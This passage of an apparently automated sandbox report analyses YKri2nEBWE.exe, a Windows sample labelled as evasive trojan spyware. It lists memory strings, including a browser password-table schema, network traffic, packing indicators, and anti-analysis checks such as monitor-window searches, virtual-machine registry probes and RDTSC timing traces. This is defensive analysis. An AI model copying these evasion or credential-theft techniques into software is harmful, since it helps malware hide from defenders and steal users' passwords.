                Source: YKri2nEBWE.exe, 00000000.00000003.2176974679.0000000005E20000.00000004.00000800.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2177049592.0000000005E1D000.00000004.00000800.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2177131102.0000000005E1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: YKri2nEBWE.exe, 00000000.00000003.2257083014.00000000060FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
                Source: YKri2nEBWE.exe, 00000000.00000003.2257083014.00000000060FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
                Source: YKri2nEBWE.exe, 00000000.00000003.2257083014.00000000060FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                Source: YKri2nEBWE.exe, 00000000.00000003.2257083014.00000000060FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: YKri2nEBWE.exe, 00000000.00000003.2257083014.00000000060FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
                Source: YKri2nEBWE.exe, 00000000.00000003.2257083014.00000000060FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: YKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 443
                Source: unknown Network traffic detected: HTTP traffic on port 49706 -> 443
                Source: unknown Network traffic detected: HTTP traffic on port 49707 -> 443
                Source: unknown Network traffic detected: HTTP traffic on port 49705 -> 443
                Source: unknown Network traffic detected: HTTP traffic on port 49704 -> 443
                Source: unknown Network traffic detected: HTTP traffic on port 49729 -> 443
                Source: unknown Network traffic detected: HTTP traffic on port 49747 -> 443
                Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49709
                Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49707
                Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49729
                Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49706
                Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49717
                Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49705
                Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49704
                Source: unknown Network traffic detected: HTTP traffic on port 49717 -> 443
                Source: unknown Network traffic detected: HTTP traffic on port 49736 -> 443
                Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49736
                Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49747
                Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.5:49704 version: TLS 1.2
                Source: unknown HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.5:49705 version: TLS 1.2
                Source: unknown HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.5:49706 version: TLS 1.2
                Source: unknown HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.5:49707 version: TLS 1.2
                Source: unknown HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.5:49709 version: TLS 1.2
                Source: unknown HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.5:49717 version: TLS 1.2
                Source: unknown HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.5:49729 version: TLS 1.2
                Source: unknown HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.5:49736 version: TLS 1.2

                System Summary

                Source: YKri2nEBWE.exe Static PE information: section name:
                Source: YKri2nEBWE.exe Static PE information: section name: .rsrc
                Source: YKri2nEBWE.exe Static PE information: section name: .idata
                Source: YKri2nEBWE.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: YKri2nEBWE.exe Static PE information: Section: ZLIB complexity 0.9995021446078431
                Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@1/0@11/2
                Source: C:\Users\user\Desktop\YKri2nEBWE.exe Code function: 0_2_00C72070 CoCreateInstance,0_2_00C72070
                Source: C:\Users\user\Desktop\YKri2nEBWE.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: YKri2nEBWE.exe, 00000000.00000003.2178127622.0000000005DF0000.00000004.00000800.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2177609713.0000000005E0B000.00000004.00000800.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2227059079.0000000005E82000.00000004.00000800.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2226640957.0000000005DFE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: YKri2nEBWE.exe Virustotal: Detection: 56%
                Source: YKri2nEBWE.exe ReversingLabs: Detection: 63%
                Source: C:\Users\user\Desktop\YKri2nEBWE.exe File read: C:\Users\user\Desktop\YKri2nEBWE.exe
                Source: C:\Users\user\Desktop\YKri2nEBWE.exe Section loaded: apphelp.dll
                Source: C:\Users\user\Desktop\YKri2nEBWE.exe Section loaded: winmm.dll
                Source: C:\Users\user\Desktop\YKri2nEBWE.exe Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\YKri2nEBWE.exe Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\YKri2nEBWE.exe Section loaded: winhttp.dll
                Source: C:\Users\user\Desktop\YKri2nEBWE.exe Section loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\Desktop\YKri2nEBWE.exe Section loaded: webio.dll
                Source: C:\Users\user\Desktop\YKri2nEBWE.exe Section loaded: mswsock.dll
                Source: C:\Users\user\Desktop\YKri2nEBWE.exe Section loaded: iphlpapi.dll
                Source: C:\Users\user\Desktop\YKri2nEBWE.exe Section loaded: winnsi.dll
                Source: C:\Users\user\Desktop\YKri2nEBWE.exe Section loaded: sspicli.dll
                Source: C:\Users\user\Desktop\YKri2nEBWE.exe Section loaded: dnsapi.dll
                Source: C:\Users\user\Desktop\YKri2nEBWE.exe Section loaded: rasadhlp.dll
                Source: C:\Users\user\Desktop\YKri2nEBWE.exe Section loaded: fwpuclnt.dll
                Source: C:\Users\user\Desktop\YKri2nEBWE.exe Section loaded: schannel.dll
                Source: C:\Users\user\Desktop\YKri2nEBWE.exe Section loaded: mskeyprotect.dll
                Source: C:\Users\user\Desktop\YKri2nEBWE.exe Section loaded: ntasn1.dll
                Source: C:\Users\user\Desktop\YKri2nEBWE.exe Section loaded: ncrypt.dll
                Source: C:\Users\user\Desktop\YKri2nEBWE.exe Section loaded: ncryptsslp.dll
                Source: C:\Users\user\Desktop\YKri2nEBWE.exe Section loaded: msasn1.dll
                Source: C:\Users\user\Desktop\YKri2nEBWE.exe Section loaded: cryptsp.dll
                Source: C:\Users\user\Desktop\YKri2nEBWE.exe Section loaded: rsaenh.dll
                Source: C:\Users\user\Desktop\YKri2nEBWE.exe Section loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\YKri2nEBWE.exe Section loaded: gpapi.dll
                Source: C:\Users\user\Desktop\YKri2nEBWE.exe Section loaded: dpapi.dll
                Source: C:\Users\user\Desktop\YKri2nEBWE.exe Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\YKri2nEBWE.exe Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\YKri2nEBWE.exe Section loaded: wbemcomn.dll
                Source: C:\Users\user\Desktop\YKri2nEBWE.exe Section loaded: amsi.dll
                Source: C:\Users\user\Desktop\YKri2nEBWE.exe Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\YKri2nEBWE.exe Section loaded: profapi.dll
                Source: C:\Users\user\Desktop\YKri2nEBWE.exe Section loaded: version.dll
                Source: YKri2nEBWE.exe Static file information: File size 2920448 > 1048576
                Source: YKri2nEBWE.exe Static PE information: Raw size of awkvfzgs is bigger than: 0x100000 < 0x29f200

                Data Obfuscation

                Source: C:\Users\user\Desktop\YKri2nEBWE.exe Unpacked PE file: 0.2.YKri2nEBWE.exe.c40000.0.unpack :EW;.rsrc :W;.idata :W;awkvfzgs:EW;nvoqryrp:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;awkvfzgs:EW;nvoqryrp:EW;.taggant:EW;
                Source: initial sample Static PE information: section where entry point is pointing to: .taggant
                Source: YKri2nEBWE.exe Static PE information: real checksum: 0x2d7472 should be: 0x2cf054
                Source: YKri2nEBWE.exe Static PE information: section name:
                Source: YKri2nEBWE.exe Static PE information: section name: .rsrc
                Source: YKri2nEBWE.exe Static PE information: section name: .idata
                Source: YKri2nEBWE.exe Static PE information: section name: awkvfzgs
                Source: YKri2nEBWE.exe Static PE information: section name: nvoqryrp
                Source: YKri2nEBWE.exe Static PE information: section name: .taggant
                Source: YKri2nEBWE.exe Static PE information: section name: entropy: 7.9818005594578265

                Boot Survival

                Source: C:\Users\user\Desktop\YKri2nEBWE.exe Window searched: window name: FilemonClass
                Source: C:\Users\user\Desktop\YKri2nEBWE.exe Window searched: window name: PROCMON_WINDOW_CLASS
                Source: C:\Users\user\Desktop\YKri2nEBWE.exe Window searched: window name: RegmonClass
                Source: C:\Users\user\Desktop\YKri2nEBWE.exe Window searched: window name: Regmonclass
                Source: C:\Users\user\Desktop\YKri2nEBWE.exe Window searched: window name: Filemonclass
                Source: C:\Users\user\Desktop\YKri2nEBWE.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                Source: C:\Users\user\Desktop\YKri2nEBWE.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                Source: C:\Users\user\Desktop\YKri2nEBWE.exe Process information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: C:\Users\user\Desktop\YKri2nEBWE.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\user\Desktop\YKri2nEBWE.exe System information queried: FirmwareTableInformation
                Source: C:\Users\user\Desktop\YKri2nEBWE.exe File opened: HKEY_CURRENT_USER\Software\Wine
                Source: C:\Users\user\Desktop\YKri2nEBWE.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E14BBF second address: E14BC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E14BC5 second address: E14C05 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push edi 0x0000000d jmp 00007FCA18DB50F6h 0x00000012 pop edi 0x00000013 mov eax, dword ptr [eax] 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FCA18DB50F8h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E14C05 second address: E14C0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E14C0B second address: E14C24 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FCA18DB50EBh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E14C24 second address: E14C29 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E14C29 second address: E14C7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pop eax 0x00000008 push 00000003h 0x0000000a push 00000000h 0x0000000c push esi 0x0000000d call 00007FCA18DB50E8h 0x00000012 pop esi 0x00000013 mov dword ptr [esp+04h], esi 0x00000017 add dword ptr [esp+04h], 00000017h 0x0000001f inc esi 0x00000020 push esi 0x00000021 ret 0x00000022 pop esi 0x00000023 ret 0x00000024 push 00000000h 0x00000026 sub dword ptr [ebp+122D1E66h], ebx 0x0000002c clc 0x0000002d push 00000003h 0x0000002f adc si, 779Ch 0x00000034 jmp 00007FCA18DB50ECh 0x00000039 push E6B39F79h 0x0000003e push ecx 0x0000003f push eax 0x00000040 push edx 0x00000041 je 00007FCA18DB50E6h 0x00000047 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E14C7C second address: E14C80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: DFC8DA second address: DFC8FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCA18DB50EFh 0x00000009 popad 0x0000000a ja 00007FCA18DB50EEh 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: DFC8FC second address: DFC901 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: DFC901 second address: DFC925 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FCA18DB50E6h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e pushad 0x0000000f push esi 0x00000010 pop esi 0x00000011 jo 00007FCA18DB50E6h 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FCA18DB50EAh 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E34B55 second address: E34B71 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FCA18C4F696h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jl 00007FCA18C4F69Eh 0x00000010 jl 00007FCA18C4F696h 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E353EC second address: E353F2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E353F2 second address: E3540B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FCA18C4F69Fh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E3554B second address: E35567 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA18DB50F8h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E35567 second address: E3557E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FCA18C4F69Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E356F5 second address: E35705 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jnl 00007FCA18DB50E6h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E35705 second address: E3570F instructions: 0x00000000 rdtsc 0x00000002 jng 00007FCA18C4F696h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E35B4C second address: E35B52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E35B52 second address: E35B56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E35B56 second address: E35B5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E35B5A second address: E35B65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E35B65 second address: E35B6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E360EE second address: E3611E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FCA18C4F6A9h 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FCA18C4F69Fh 0x00000010 push edx 0x00000011 pop edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: DFC8F6 second address: DFC8FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E363D5 second address: E3640E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA18C4F6A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a pushad 0x0000000b popad 0x0000000c pop esi 0x0000000d pop ecx 0x0000000e jg 00007FCA18C4F6C8h 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FCA18C4F6A5h 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E01804 second address: E01808 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E01808 second address: E01814 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E01814 second address: E01818 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E01818 second address: E0181E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E3A385 second address: E3A39E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCA18DB50F5h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E09F99 second address: E09FB4 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FCA18C4F6A2h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E09FB4 second address: E09FB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E41D91 second address: E41D97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E41D97 second address: E41D9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E42079 second address: E4209B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FCA18C4F6A8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E42470 second address: E42476 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E42476 second address: E42486 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FCA18C4F696h 0x00000008 jnc 00007FCA18C4F696h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E42486 second address: E42490 instructions: 0x00000000 rdtsc 0x00000002 js 00007FCA18DB50ECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E42490 second address: E424AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007FCA18C4F6A2h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E42625 second address: E4262B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E4262B second address: E42631 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E42631 second address: E42644 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push edx 0x0000000a pop edx 0x0000000b jng 00007FCA18DB50E6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E4559F second address: E455EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edx 0x00000008 jl 00007FCA18C4F696h 0x0000000e pop edx 0x0000000f popad 0x00000010 push eax 0x00000011 jns 00007FCA18C4F6A2h 0x00000017 mov eax, dword ptr [esp+04h] 0x0000001b jmp 00007FCA18C4F6A6h 0x00000020 mov eax, dword ptr [eax] 0x00000022 push eax 0x00000023 push edx 0x00000024 jng 00007FCA18C4F69Ch 0x0000002a jg 00007FCA18C4F696h 0x00000030 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E455EC second address: E45630 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA18DB50ECh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push edi 0x0000000e js 00007FCA18DB50ECh 0x00000014 ja 00007FCA18DB50E6h 0x0000001a pop edi 0x0000001b pop eax 0x0000001c xor edi, 24686CEFh 0x00000022 jmp 00007FCA18DB50ECh 0x00000027 push 030E6A92h 0x0000002c push eax 0x0000002d push edx 0x0000002e push edi 0x0000002f jnl 00007FCA18DB50E6h 0x00000035 pop edi 0x00000036 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E459F8 second address: E459FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E459FC second address: E45A06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E45A06 second address: E45A29 instructions: 0x00000000 rdtsc 0x00000002 je 00007FCA18C4F696h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d jmp 00007FCA18C4F6A3h 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E45B26 second address: E45B2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E461A0 second address: E461A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E46361 second address: E46365 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E46365 second address: E46380 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FCA18C4F6A2h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E46406 second address: E4640A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E4640A second address: E46414 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E46414 second address: E46418 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E464DC second address: E464E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E464E1 second address: E464E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
